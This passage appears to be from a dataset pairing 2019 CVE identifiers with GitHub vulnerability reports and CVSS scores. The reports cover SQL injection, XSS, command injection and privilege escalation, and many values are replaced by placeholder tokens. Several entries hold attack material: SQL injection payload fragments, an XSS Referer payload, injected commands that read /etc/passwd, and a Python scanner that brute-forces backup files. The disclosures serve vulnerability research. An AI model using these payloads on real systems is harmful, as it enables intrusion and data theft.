  35367. "Issue_Created_At": "2019-05-22T06:57:39Z",
  35368. "description": "zzcms NUMBERTAG SQL injection in FILETAG . Link Url : FILETAG Edition : ZZCMS NUMBERTAG ulnerability FILETAG line NUMBERTAG FILETAG If index of ',' value in id parameter is bigger than NUMBERTAG sql will be FILETAG When we check the query there is no single quote to id parameter. So We can inject any query with id parameter FILETAG We can find there is no security filter for id parameter and we can inject Sql query via id parameter if we concat ',' value at the end of id parameter NUMBERTAG payload give below \"POC\" value for post data in PATHTAG POC : union SQL injection APITAG APITAG union select APITAG a, FILETAG FILETAG",
  35369. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  35370. "severity": "CRITICAL",
  35371. "baseScore": 9.8,
  35372. "impactScore": 5.9,
  35373. "exploitabilityScore": 3.9
  35374. },
  35375. {
  35376. "CVE_ID": "CVE-2019-12352",
  35377. "Issue_Url_old": "https://github.com/cby234/zzcms/issues/5",
  35378. "Issue_Url_new": "https://github.com/cby234/zzcms/issues/5",
  35379. "Repo_new": "cby234/zzcms",
  35380. "Issue_Created_At": "2019-05-28T00:43:57Z",
  35381. "description": "zzcms NUMBERTAG SQL INJECTION LIST NUMBERTAG FILETAG NUMBERTAG ulnerability FILETAG line NUMBERTAG FILETAG If index of ',' value in id parameter is not false sql will be FILETAG When we check the query there is no single quote to id parameter. So We can inject any query with id parameter FILETAG We can find there is no security filter for id parameter and it means we can inject Sql query via id parameter if we concat ',' value at the end of id parameter NUMBERTAG payload give below \"POC\" value for post data in PATHTAG POC : union SQL injection APITAG xls&sql=select+count NUMBERTAG APITAG &id NUMBERTAG B NUMBERTAG D NUMBERTAG union select APITAG a, FILETAG FILETAG NUMBERTAG FILETAG NUMBERTAG ulnerability FILETAG line NUMBERTAG FILETAG If index of ',' value in id parameter is not false sql will be FILETAG When we check the query there is no single quote to id parameter. So We can inject any query with id parameter FILETAG We can find there is no security filter for id parameter and it means we can inject Sql query via id parameter if we concat ',' value at the end of id parameter NUMBERTAG payload give below \"POC\" value for post data in PATHTAG POC : union SQL injection APITAG xls&sql=select+count NUMBERTAG APITAG &id NUMBERTAG B NUMBERTAG D NUMBERTAG union select APITAG a, FILETAG FILETAG NUMBERTAG FILETAG NUMBERTAG ulnerability FILETAG line NUMBERTAG FILETAG If index of ',' value in COOKIE FILETAG When we check the query there is no single quote to COOKIE FILETAG n var will get value via GET FILETAG FILETAG NUMBERTAG FILETAG NUMBERTAG ulnerability FILETAG line NUMBERTAG FILETAG If index of ',' value in COOKIE FILETAG When we check the query there is no single quote to COOKIE FILETAG n var will get value via GET FILETAG FILETAG NUMBERTAG FILETAG NUMBERTAG ulnerability FILETAG line NUMBERTAG FILETAG If index of ',' value in id parameter is bigger than NUMBERTAG sql will be FILETAG When we check the query there is no single quote to id 
parameter. So We can inject any query with id parameter FILETAG We can find there is no security filter for id parameter and it means we can inject Sql query via id parameter if we concat ',' value at the end of id parameter NUMBERTAG payload give below \"POC\" value for post data in PATHTAG \" POC : union sql injection tablename=zzcms_main&id FILETAG FILETAG NUMBERTAG FILETAG NUMBERTAG ulnerability FILETAG line NUMBERTAG FILETAG If index of ',' value in id parameter is bigger than NUMBERTAG sql will be FILETAG When we check the query there is no single quote to id parameter. So We can inject any query with id parameter FILETAG We can find there is no security filter for id parameter and it means we can inject Sql query via id parameter if we concat ',' value at the end of id parameter NUMBERTAG payload give below \"POC\" value for post data in PATHTAG \" POC : union Time base sql injection id FILETAG FILETAG NUMBERTAG FILETAG NUMBERTAG ulnerability FILETAG line NUMBERTAG FILETAG If index of ',' value in id parameter is bigger than NUMBERTAG sql will be FILETAG When we check the query there is no single quote to id parameter. So We can inject any query with id parameter FILETAG We can find there is no security filter for id parameter and it means we can inject Sql query via id parameter if we concat ',' value at the end of id parameter NUMBERTAG payload give below \"POC\" value for post data in PATHTAG \" POC : Time base sql injection id FILETAG FILETAG NUMBERTAG FILETAG NUMBERTAG ulnerability FILETAG line NUMBERTAG FILETAG If index of ',' value in id parameter is bigger than NUMBERTAG sql will be FILETAG When we check the query there is no single quote to id parameter. 
So We can inject any query with id parameter FILETAG We can find there is no security filter for id parameter and it means we can inject Sql query via id parameter if we concat ',' value at the end of id parameter NUMBERTAG payload give below \"POC\" value for post data in PATHTAG POC : union Time base sql injection id FILETAG FILETAG",
  35382. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  35383. "severity": "HIGH",
  35384. "baseScore": 8.8,
  35385. "impactScore": 5.9,
  35386. "exploitabilityScore": 2.8
  35387. },
  35388. {
  35389. "CVE_ID": "CVE-2019-12361",
  35390. "Issue_Url_old": "https://github.com/coolboy0816/audit/issues/3",
  35391. "Issue_Url_new": "https://github.com/coolboy0816/audit/issues/3",
  35392. "Repo_new": "coolboy0816/audit",
  35393. "Issue_Created_At": "2019-04-04T08:37:31Z",
  35394. "description": "Empire CMS/URL jump&&reflection XSS&&condition csrf. From parameters for collecting articles payload: post: PATHTAG APITAG APITAG FILETAG Because of Empire CMS automatically jumps when the collection is successful, vulnerabilities are upgraded to remote JS code execution without interaction with users Prove\uff1a FILETAG Loophole utilization\uff1a Set jump to remote URL with attack APITAG the script as follows\uff1a FILETAG APITAG APITAG APITAG APITAG ERRORTAG CODETAG APITAG APITAG APITAG APITAG APITAG FILETAG APITAG APITAG APITAG APITAG APITAG ERRORTAG APITAG APITAG APITAG APITAG APITAG APITAG Payload contains a conditional APITAG the background source authentication code is not opened in the background security mode, CSRF can be used to change the dynamic page template. Here, we choose to resend the registered activation mail page. The path is PATHTAG The effect of the attack is as follows\uff1a FILETAG",
  35395. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  35396. "severity": "MEDIUM",
  35397. "baseScore": 6.1,
  35398. "impactScore": 2.7,
  35399. "exploitabilityScore": 2.8
  35400. },
  35401. {
  35402. "CVE_ID": "CVE-2019-12362",
  35403. "Issue_Url_old": "https://github.com/coolboy0816/audit/issues/4",
  35404. "Issue_Url_new": "https://github.com/coolboy0816/audit/issues/4",
  35405. "Repo_new": "coolboy0816/audit",
  35406. "Issue_Created_At": "2019-04-04T09:24:52Z",
  35407. "description": "Empire CMS/reflect xss. When a user logs APITAG XSS exists in Referer payload\uff1a Referer\uff1ajavascript:alert APITAG JS can be injected into the page by Referer The vulnerability involved is the parameter key in Referer FILETAG FILETAG",
  35408. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  35409. "severity": "MEDIUM",
  35410. "baseScore": 6.1,
  35411. "impactScore": 2.7,
  35412. "exploitabilityScore": 2.8
  35413. },
  35414. {
  35415. "CVE_ID": "CVE-2019-12395",
  35416. "Issue_Url_old": "https://github.com/webbukkit/dynmap/issues/2474",
  35417. "Issue_Url_new": "https://github.com/webbukkit/dynmap/issues/2474",
  35418. "Repo_new": "webbukkit/dynmap",
  35419. "Issue_Created_At": "2019-05-02T08:18:24Z",
  35420. "description": "Required login bypass vulnerability. APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG Server Information Spigot version NUMBERTAG ersion NUMBERTAG beta NUMBERTAG I can reproduce this issue consistently I have searched for this issue previously and it was either not previously reported. APITAG Issue Description Due to missing login check in APITAG , attacker can see map image without login despite \"login required\" is enabled in configuration. APITAG Reproduce Steps NUMBERTAG Enable APITAG and APITAG in configuration NUMBERTAG Try this APITAG URLTAG",
  35421. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
  35422. "severity": "MEDIUM",
  35423. "baseScore": 5.3,
  35424. "impactScore": 1.4,
  35425. "exploitabilityScore": 3.9
  35426. },
  35427. {
  35428. "CVE_ID": "CVE-2019-12439",
  35429. "Issue_Url_old": "https://github.com/projectatomic/bubblewrap/issues/304",
  35430. "Issue_Url_new": "https://github.com/containers/bubblewrap/issues/304",
  35431. "Repo_new": "containers/bubblewrap",
  35432. "Issue_Created_At": "2019-03-02T11:29:02Z",
  35433. "description": "potentially insecure use of /tmp. MENTIONTAG reported this Debian bug NUMBERTAG CVETAG : > [If] PATHTAG doesn't exist and couldn't be created > (as was the case on my system), bubblewrap falls back to > PATHTAG Local attacker could exploit this to prevent > other users from running bubblewrap, for example: > > getent passwd | cut d: f3 | xargs printf PATHTAG | xargs touch > > But it gets worse, because bubblewrap is happy to use existing > PATHTAG even when the directory is owned by some else. > In the worst case, this could be exploited by a local user to execute > arbitrary code in the container. APITAG I couldn't find any way to > exploit this without disabling protected_symlinks.)",
  35434. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  35435. "severity": "HIGH",
  35436. "baseScore": 7.8,
  35437. "impactScore": 5.9,
  35438. "exploitabilityScore": 1.8
  35439. },
  35440. {
  35441. "CVE_ID": "CVE-2019-12452",
  35442. "Issue_Url_old": "https://github.com/containous/traefik/issues/4917",
  35443. "Issue_Url_new": "https://github.com/traefik/traefik/issues/4917",
  35444. "Repo_new": "traefik/traefik",
  35445. "Issue_Created_At": "2019-05-29T14:19:49Z",
  35446. "description": "Authentication hashes are available through the API. Do you want to request a feature or report a bug ? Bug Did you try using a NUMBERTAG configuration for the version NUMBERTAG Yes [x] No What did you do? Enabled Traefik API, creating a frontend protected with a user / password Fetched the API What did you expect to see? CODETAG What did you see instead? CODETAG => So I can totally use a rainbow table to de hash the password until NUMBERTAG characters easily (more is challenging as for today), even if there is a salt in the basic auth. Output of traefik version : APITAG version of Traefik are you using?_) CODETAG What is your environment & configuration (arguments, toml, provider, platform, ...)? Simple reproduction case, with a frontend on the API itself for the sake of simplicity: APITAG is user and password is password ) CODETAG If applicable, please paste the log output in DEBUG level ( APITAG switch) Not applicable",
  35447. "vectorString": "CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
  35448. "severity": "HIGH",
  35449. "baseScore": 7.5,
  35450. "impactScore": 5.9,
  35451. "exploitabilityScore": 1.6
  35452. },
  35453. {
  35454. "CVE_ID": "CVE-2019-12457",
  35455. "Issue_Url_old": "https://github.com/EmreOvunc/FileRun-Vulnerabilities/issues/3",
  35456. "Issue_Url_new": "https://github.com/emreovunc/filerun-vulnerabilities/issues/3",
  35457. "Repo_new": "emreovunc/filerun-vulnerabilities",
  35458. "Issue_Created_At": "2019-07-01T18:36:51Z",
  35459. "description": "Remediation. The now available APITAG update APITAG fixes the reported issues. The update can be installed from the APITAG control panel: URLTAG Great work with your findings! Kindly drop us a quick message if you find anything else in the future, to give the many users of our software a chance of protecting themselves. You'd still get the credit for it.",
  35460. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
  35461. "severity": "MEDIUM",
  35462. "baseScore": 5.3,
  35463. "impactScore": 1.4,
  35464. "exploitabilityScore": 3.9
  35465. },
  35466. {
  35467. "CVE_ID": "CVE-2019-12481",
  35468. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1249",
  35469. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1249",
  35470. "Repo_new": "gpac/gpac",
  35471. "Issue_Created_At": "2019-05-27T07:11:13Z",
  35472. "description": "4 bugs found in gpac NUMBERTAG release. Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue thank you! x] I looked for a similar issue and couldn't find any. [ ] I tried with the latest version of GPAC. Installers available at URLTAG [x] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command line ...). I can share files anonymously with this dropbox: URLTAG Detailed guidelines: URLTAG APITAG version APITAG NUMBERTAG description APITAG download link others please send email to EMAILTAG if you have any questions. EMAILTAG NUMBERTAG null pointer dereference description An issue was discovered in APITAG NUMBERTAG There is a/an null pointer dereference in function APITAG at APITAG NUMBERTAG commandline APITAG info APITAG source ERRORTAG my dbg CODETAG bug report ERRORTAG others from fuzz project None crash name None NUMBERTAG mp4 Auto generated by pyspider at NUMBERTAG please send email to EMAILTAG if you have any questions. APITAG NUMBERTAG null pointer dereference description An issue was discovered in APITAG NUMBERTAG There is a/an null pointer dereference in function APITAG at APITAG NUMBERTAG commandline APITAG info APITAG source CODETAG my debug CODETAG bug report ERRORTAG others from fuzz project None crash name None NUMBERTAG mp4 Auto generated by pyspider at NUMBERTAG please send email to EMAILTAG if you have any questions. EMAILTAG NUMBERTAG null pointer dereference description An issue was discovered in APITAG NUMBERTAG There is a/an null pointer dereference in function APITAG at APITAG NUMBERTAG commandline APITAG info APITAG source ERRORTAG mydebug CODETAG bug report ERRORTAG others from fuzz project None crash name None NUMBERTAG mp4 Auto generated by pyspider at NUMBERTAG please send email to EMAILTAG if you have any questions. 
APITAG NUMBERTAG heap buffer overflow description An issue was discovered in APITAG NUMBERTAG There is a/an heap buffer overflow in function APITAG at APITAG NUMBERTAG commandline APITAG info APITAG source CODETAG bug report ERRORTAG others from fuzz project None crash name None NUMBERTAG mp4 Auto generated by pyspider at NUMBERTAG please send email to EMAILTAG if you have any questions. other info ERRORTAG [POC URLTAG",
  35473. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  35474. "severity": "MEDIUM",
  35475. "baseScore": 5.5,
  35476. "impactScore": 3.6,
  35477. "exploitabilityScore": 1.8
  35478. },
  35479. {
  35480. "CVE_ID": "CVE-2019-12494",
  35481. "Issue_Url_old": "https://github.com/gardener/vpn/issues/40",
  35482. "Issue_Url_new": "https://github.com/gardener/vpn/issues/40",
  35483. "Repo_new": "gardener/vpn",
  35484. "Issue_Created_At": "2019-03-27T13:01:51Z",
  35485. "description": "Add firewall rules to vpn seed pod. We should block all traffic from the shoot cluster to the control plane in the seed cluster by adding firewall rules to the vpn seed pod.",
  35486. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  35487. "severity": "HIGH",
  35488. "baseScore": 7.5,
  35489. "impactScore": 3.6,
  35490. "exploitabilityScore": 3.9
  35491. },
  35492. {
  35493. "CVE_ID": "CVE-2019-12499",
  35494. "Issue_Url_old": "https://github.com/netblue30/firejail/issues/2401",
  35495. "Issue_Url_new": "https://github.com/netblue30/firejail/issues/2401",
  35496. "Repo_new": "netblue30/firejail",
  35497. "Issue_Created_At": "2019-02-13T19:35:12Z",
  35498. "description": "CVETAG . Is firejail vulnerable to this? It seems to be a common implementation issue when using privileged namespaces. runc, docker, k8s, lxc, and flatpak have all had patches issued for it. See URLTAG URLTAG URLTAG URLTAG",
  35499. "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
  35500. "severity": "HIGH",
  35501. "baseScore": 8.1,
  35502. "impactScore": 5.9,
  35503. "exploitabilityScore": 2.2
  35504. },
  35505. {
  35506. "CVE_ID": "CVE-2019-12564",
  35507. "Issue_Url_old": "https://github.com/srsec/-srsec-/issues/1",
  35508. "Issue_Url_new": "https://github.com/srsec/-srsec-/issues/1",
  35509. "Repo_new": "srsec/-srsec-",
  35510. "Issue_Created_At": "2019-05-22T08:41:54Z",
  35511. "description": "Any user can view or now, the whole station database backup file. The latest version of APITAG NUMBERTAG Release NUMBERTAG the background can back up the entire station data, but does not have access control on the backup file, resulting in any user can view or now the database file. APITAG in to the background and back up data through the data backup APITAG generate a sql file in the format of the date. FILETAG NUMBERTAG We look at the path generated by the backup file. FILETAG FILETAG APITAG user can access the backup file path through the url, and can view the download backup file. FILETAG FILETAG APITAG file generation format (current date and time format file). FILETAG FILETAG NUMBERTAG follow up APITAG the core file and make no access restrictions on the backup file, resulting in a vulnerability. FILETAG NUMBERTAG POC FILETAG needs to be customized to generate a dictionary in time format)\u3002 import APITAG import time import threading url = input(\"url\uff1a\") txt = APITAG open_url = [] all_url = [] threads = [] Can be customized def search_url(url,txt): with open(txt,'r') as f: for each in f: each = APITAG urllist = url + each +'.sql' APITAG def handle_url(urllist): APITAG try: req = APITAG Judgment return code if APITAG or NUMBERTAG APITAG APITAG file\uff1a\"+urllist+' ') if APITAG APITAG file\uff1a\"+urllist+' ') APITAG except: pass def APITAG search_url(url,txt) for each in all_url: t = APITAG = handle_url,args=(each,)) APITAG APITAG for t in threads: APITAG if open_url: APITAG scan, successful url:\uff1a\") for each in open_url: print(\"[+]\"+each) else: APITAG is a scan to the background of the website (maybe the dictionary is not enough to force)\") if __name__==\"__main__\": Judge program run time start = APITAG APITAG end = APITAG APITAG function spend time is NUMBERTAG f seconds\" %(end start)) APITAG a specific date dictionary file script import time Can be customized for h in range NUMBERTAG for i in range NUMBERTAG for 
s in range NUMBERTAG if(h NUMBERTAG and i NUMBERTAG and s NUMBERTAG APITAG print(data) elif h NUMBERTAG and i NUMBERTAG and (s NUMBERTAG and s APITAG NUMBERTAG APITAG print(data) elif h NUMBERTAG and (i NUMBERTAG and (s NUMBERTAG and s APITAG NUMBERTAG and h APITAG NUMBERTAG and i NUMBERTAG and (s NUMBERTAG and s APITAG NUMBERTAG and i APITAG NUMBERTAG APITAG print(data) elif h NUMBERTAG and (i NUMBERTAG and i APITAG NUMBERTAG and i NUMBERTAG and (s NUMBERTAG and s APITAG NUMBERTAG and i NUMBERTAG and (s NUMBERTAG and s APITAG NUMBERTAG and h NUMBERTAG and (i NUMBERTAG and i NUMBERTAG and (s NUMBERTAG and s APITAG NUMBERTAG and h NUMBERTAG and (s NUMBERTAG and s APITAG NUMBERTAG and h NUMBERTAG and (s NUMBERTAG and s NUMBERTAG and (i NUMBERTAG and i NUMBERTAG APITAG print(data) else: APITAG print(data)",
  35512. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  35513. "severity": "CRITICAL",
  35514. "baseScore": 9.8,
  35515. "impactScore": 5.9,
  35516. "exploitabilityScore": 3.9
  35517. },
  35518. {
  35519. "CVE_ID": "CVE-2019-12566",
  35520. "Issue_Url_old": "https://github.com/wp-statistics/wp-statistics/issues/271",
  35521. "Issue_Url_new": "https://github.com/wp-statistics/wp-statistics/issues/271",
  35522. "Repo_new": "wp-statistics/wp-statistics",
  35523. "Issue_Created_At": "2019-05-30T05:14:25Z",
  35524. "description": "Page's title should be encoded or filtering html entities/javascript code. I was testing on : Wordpress NUMBERTAG WP Statistic NUMBERTAG Account with Editor role can create Post with Title that contain javascript/html. For example : APITAG FILETAG WP statistics page that use these title will got affected for xss attack, for example : overviews, pages,... FILETAG Even if the Editor delete the Post, but it still remain in top NUMBERTAG page that got most hit, the Overviews page still be affected. So in reality, attacker that controls the Editor account can create page with title that contains malicious javascript code that steal admin cookie (for example), visit it a lot that make it be in top NUMBERTAG page most visited, delete the post so admin won't notice the weird post that have javascript in title. And when admin click on Overviews page of WP Statistic, his cookie will be stolen.",
  35525. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  35526. "severity": "MEDIUM",
  35527. "baseScore": 5.4,
  35528. "impactScore": 2.7,
  35529. "exploitabilityScore": 2.3
  35530. },
  35531. {
  35532. "CVE_ID": "CVE-2019-12589",
  35533. "Issue_Url_old": "https://github.com/netblue30/firejail/issues/2718",
  35534. "Issue_Url_new": "https://github.com/netblue30/firejail/issues/2718",
  35535. "Repo_new": "netblue30/firejail",
  35536. "Issue_Created_At": "2019-05-21T08:36:14Z",
  35537. "description": "seccomp bypass when joining existing jail. seccomp filters are copied into APITAG , and are writable within the jail. A malicious process can modify files from inside the jail. Processes that are later joined to the jail will not have seccomp filters applied. repro steps compile program to call blacklisted syscall CODETAG create interactive jail session APITAG try to run program inside jail, noting syscall is blocked APITAG open new terminal and run program by joining jail, noting syscall is blocked APITAG back in original interactive jail session, empty the APITAG file and attempt to run program, noting syscall is blocked APITAG open new terminal and run program by joining jail, noting syscall is NOT blocked APITAG",
  35538. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H",
  35539. "severity": "HIGH",
  35540. "baseScore": 8.8,
  35541. "impactScore": 6.0,
  35542. "exploitabilityScore": 2.0
  35543. },
  35544. {
  35545. "CVE_ID": "CVE-2019-12618",
  35546. "Issue_Url_old": "https://github.com/hashicorp/nomad/issues/5783",
  35547. "Issue_Url_new": "https://github.com/hashicorp/nomad/issues/5783",
  35548. "Repo_new": "hashicorp/nomad",
  35549. "Issue_Created_At": "2019-06-05T17:50:45Z",
  35550. "description": "CVETAG : Privilege Escalation in NUMBERTAG It was discovered that exec driver tasks run with full Linux capabilities such that processes can escalate to run as privileged root user, despite running as the Linux unprivileged user, nobody. This vulnerability affects versions NUMBERTAG and NUMBERTAG of Nomad, both OSS and Enterprise and was fixed in NUMBERTAG Background Nomad allows running various types of workloads. The exec driver runs processes in a chroot environment and a lightweight container. By default, Nomad NUMBERTAG runs exec processes as nobody user with no Linux capabilities. This meant that processes could not do any privileged operations, ones commonly associated with root. However, a regression in Nomad NUMBERTAG allows such processes to perform privileged operations that can be malicious. For example, a process can conceivably escape the chroot, kill any host process, read and manipulate any file inside the chroot, or bind to privileged ports NUMBERTAG Some commands (e.g. mount) may block malicious operations directly, as they detect that the user is not root, but a determined attacker can circumvent this protection by performing the kernel system call directly. This vulnerability constitutes a serious unintentional privilege grant, and Nomad NUMBERTAG reverts to Nomad NUMBERTAG capabilities. It is worth noting that the exec driver is not intended to provide strong security isolation, as exec tasks can access any network services on host (including nomad agent if not configured with tls and ACL, and the cloud metadata endpoints). Users are encouraged to use VM based drivers (qemu) or container based drivers (e.g. docker) to enforce stricter security isolation. Remediation Clusters with the exec driver enabled must upgrade to NUMBERTAG Only Nomad clients must be upgraded to fix the vulnerability. Alternatively, the exec driver may be disabled using the client configuration or via Sentinel in Nomad Enterprise. 
No workaround is present to run exec tasks safely in a NUMBERTAG or NUMBERTAG cluster. To disable the exec task driver use the following configuration on every client node: APITAG See the client configuration documentation URLTAG for more details.",
  35551. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  35552. "severity": "CRITICAL",
  35553. "baseScore": 9.8,
  35554. "impactScore": 5.9,
  35555. "exploitabilityScore": 3.9
  35556. },
  35557. {
  35558. "CVE_ID": "CVE-2019-12728",
  35559. "Issue_Url_old": "https://github.com/grails/grails-core/issues/11250",
  35560. "Issue_Url_new": "https://github.com/grails/grails-core/issues/11250",
  35561. "Repo_new": "grails/grails-core",
  35562. "Issue_Created_At": "2019-02-19T21:52:47Z",
  35563. "description": "FILETAG FILETAG The build files indicate that this project is resolving dependencies over HTTP instead of HTTPS. Any of these artifacts could have been MITM to maliciously compromise them and infect the build artifacts that were produced. Additionally, if any of these JARs or other dependencies were compromised, any developers using these could continue to be infected past updating to fix this. This vulnerability has a CVSS NUMBERTAG Base Score of NUMBERTAG URLTAG This isn't just theoretical POC code has existed since NUMBERTAG to maliciously compromise a JAR file inflight. See: URLTAG URLTAG MITM Attacks Increasingly Common See: URLTAG URLTAG Source Locations URLTAG Public Disclosure Option NUMBERTAG File for a CVE A project maintainer for this project should probably file for a CVE number to inform the public about this vulnerability in the build for this project. The goal is to inform the public that there was a potential for published build artifacts to have been maliciously compromised in earlier releases. If a maintainer on this project works for or is associated with a CNA, please have them file it with them: FILETAG Otherwise, an open source CVE should be filed for here: FILETAG Option NUMBERTAG Manually validate the release artifacts If this project's build is fully reproducible URLTAG . An alternative to filing for a CVE is to go back and build the earlier releases (with the HTTPS patch applied) to confirm the artifacts were not tampered when they were built. This can be done by comparing the hashes of the artifacts built locally with the ones published. If the hashes of all previous artifacts match those that are published, you can safely assume that the releases were not tampered with. Again, this assumes that the build is fully reproducible and will require significantly more work.",
  35564. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
  35565. "severity": "HIGH",
  35566. "baseScore": 8.1,
  35567. "impactScore": 5.9,
  35568. "exploitabilityScore": 2.2
  35569. },
  35570. {
  35571. "CVE_ID": "CVE-2019-12732",
  35572. "Issue_Url_old": "https://github.com/ankane/chartkick/issues/488",
  35573. "Issue_Url_new": "https://github.com/ankane/chartkick/issues/488",
  35574. "Repo_new": "ankane/chartkick",
  35575. "Issue_Created_At": "2019-06-04T19:07:47Z",
  35576. "description": "XSS Vulnerability in Chartkick Ruby Gem. Under certain conditions, the Chartkick Ruby gem is vulnerable to a cross site scripting (XSS) attack. This vulnerability has been assigned the CVE identifier CVETAG . Versions Affected NUMBERTAG and below Fixed Versions NUMBERTAG Impact Chartkick is vulnerable to a cross site scripting (XSS) attack if BOTH the following conditions are met: Condition NUMBERTAG It's used with APITAG (this is not the default for Rails) OR used with a non Rails framework like Sinatra. Condition NUMBERTAG Untrusted data or options are passed to a chart. APITAG All users running an affected release should upgrade immediately.",
  35577. "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:C/C:L/I:L/A:N",
  35578. "severity": "MEDIUM",
  35579. "baseScore": 4.7,
  35580. "impactScore": 2.7,
  35581. "exploitabilityScore": 1.6
  35582. },
  35583. {
  35584. "CVE_ID": "CVE-2019-12741",
  35585. "Issue_Url_old": "https://github.com/jamesagnew/hapi-fhir/issues/1335",
  35586. "Issue_Url_new": "https://github.com/hapifhir/hapi-fhir/issues/1335",
  35587. "Repo_new": "hapifhir/hapi-fhir",
  35588. "Issue_Created_At": "2019-06-05T14:27:51Z",
  35589. "description": "Potential XSS exploit in hapi fhir testpage overlay. This is a public tracking ticket to document the fix for an XSS exploit reported by Mudit Punia and Deshuyant Garg. The issue has been corrected in HAPI FHIR NUMBERTAG via the following commit: URLTAG In this issue, when using the hapi fhir testpage overlay (the testing UI most known for its display on FILETAG ) several URL parameters are not sanitized. This could lead to information disclosure (such as cookies) via a specially crafted URL.",
  35590. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  35591. "severity": "MEDIUM",
  35592. "baseScore": 6.1,
  35593. "impactScore": 2.7,
  35594. "exploitabilityScore": 2.8
  35595. },
  35596. {
  35597. "CVE_ID": "CVE-2019-12760",
  35598. "Issue_Url_old": "https://github.com/davidhalter/parso/issues/75",
  35599. "Issue_Url_new": "https://github.com/davidhalter/parso/issues/75",
  35600. "Repo_new": "davidhalter/parso",
  35601. "Issue_Created_At": "2019-06-11T08:51:37Z",
  35602. "description": "Deserialization vulnerability ( CVETAG ). Vulnerability Description : See CVETAG URLTAG Note : Let us be honest, this should be very unlikely to be exploitable in the wild.",
  35603. "vectorString": "CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
  35604. "severity": "HIGH",
  35605. "baseScore": 7.5,
  35606. "impactScore": 5.9,
  35607. "exploitabilityScore": 1.6
  35608. },
  35609. {
  35610. "CVE_ID": "CVE-2019-12771",
  35611. "Issue_Url_old": "https://github.com/Thinstation/thinstation/issues/427",
  35612. "Issue_Url_new": "https://github.com/thinstation/thinstation/issues/427",
  35613. "Repo_new": "thinstation/thinstation",
  35614. "Issue_Created_At": "2019-06-06T23:12:21Z",
  35615. "description": "CGI Generic Command Execution APITAG on NUMBERTAG Could affect latest version. The following resources are vulnerable to arbitrary command execution on Thinstation in /cgi APITAG and /cgi APITAG APITAG /cgi APITAG action=;id eject;ifconfig back;ls alt forward;whoami pause;hostname /cgi APITAG OK=;cat /etc/passwd Please patch asap. Could affects up to latest versions. For more information read: URLTAG",
  35616. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  35617. "severity": "CRITICAL",
  35618. "baseScore": 9.8,
  35619. "impactScore": 5.9,
  35620. "exploitabilityScore": 3.9
  35621. },
  35622. {
  35623. "CVE_ID": "CVE-2019-12779",
  35624. "Issue_Url_old": "https://github.com/ClusterLabs/libqb/issues/338",
  35625. "Issue_Url_new": "https://github.com/clusterlabs/libqb/issues/338",
  35626. "Repo_new": "clusterlabs/libqb",
  35627. "Issue_Created_At": "2019-03-01T14:15:25Z",
  35628. "description": "Insecure Temporary Files. Libqb creates files in world writable directories ( APITAG , APITAG ) with rather predictable file names (e.g. APITAG in case of APITAG Also APITAG flag is not used when opening the files. This could be exploited by a local attacker to overwrite privileged system files (if not restricted by sandboxing, MAC or symlinking policies). At least APITAG flag should be used. I'd also use more complex logic where files are created with unpredictable names (also using APITAG ) and then possibly renamed to match file naming convention (if the protocol does not allow completely random file names). I would not use files for IPC.",
  35629. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H",
  35630. "severity": "HIGH",
  35631. "baseScore": 7.1,
  35632. "impactScore": 5.2,
  35633. "exploitabilityScore": 1.8
  35634. },
  35635. {
  35636. "CVE_ID": "CVE-2019-12790",
  35637. "Issue_Url_old": "https://github.com/radare/radare2/issues/14211",
  35638. "Issue_Url_new": "https://github.com/radareorg/radare2/issues/14211",
  35639. "Repo_new": "radareorg/radare2",
  35640. "Issue_Created_At": "2019-06-02T19:35:30Z",
  35641. "description": "ragg2 crash on long valid input.. Work environment | Questions | Answers | | | PATHTAG (mandatory) | Ubuntu NUMBERTAG File format of the file you reverse (mandatory) | ELF | Architecture/bits of the file (mandatory NUMBERTAG r2 v full output, not truncated (mandatory) | radare NUMBERTAG git NUMBERTAG linu NUMBERTAG APITAG NUMBERTAG g NUMBERTAG f2caa3 commit: APITAG build NUMBERTAG Expected behavior APITAG Actual behavior APITAG Steps to reproduce the behavior Unzip FILETAG and you will get APITAG Additional Logs, screenshots, source code, configuration dump, ... After checking the source code, the vulnerability is caused by lacking boundary checking for \"egg APITAG URLTAG , resulting a heap buffer overflow. It could be fixed quickly by adding associated checking.",
  35642. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
